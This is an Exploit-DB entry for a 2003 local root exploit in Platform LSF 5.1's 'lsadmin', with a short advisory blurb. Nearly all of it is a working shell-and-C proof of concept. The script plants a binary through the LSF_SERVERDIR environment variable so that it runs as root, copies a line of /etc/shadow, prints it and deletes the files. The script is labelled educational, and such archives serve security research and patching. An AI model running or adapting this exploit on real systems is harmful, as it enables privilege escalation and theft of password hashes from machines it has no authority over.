Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability

2003-03-20T00:00:00
ID EDB-ID:22628
Type exploitdb
Reporter Tomasz Grabowski
Modified 2003-03-20T00:00:00

Description

Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability. Local exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/7655/info

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. 

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file